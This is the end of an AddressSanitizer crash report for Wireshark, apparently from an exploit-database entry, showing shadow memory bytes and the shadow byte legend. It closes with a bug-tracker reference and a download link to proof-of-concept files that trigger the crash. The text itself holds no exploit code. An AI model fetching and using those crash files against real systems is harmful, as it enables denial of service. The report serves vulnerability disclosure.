0x0ffde21fa6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==695==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39750.zip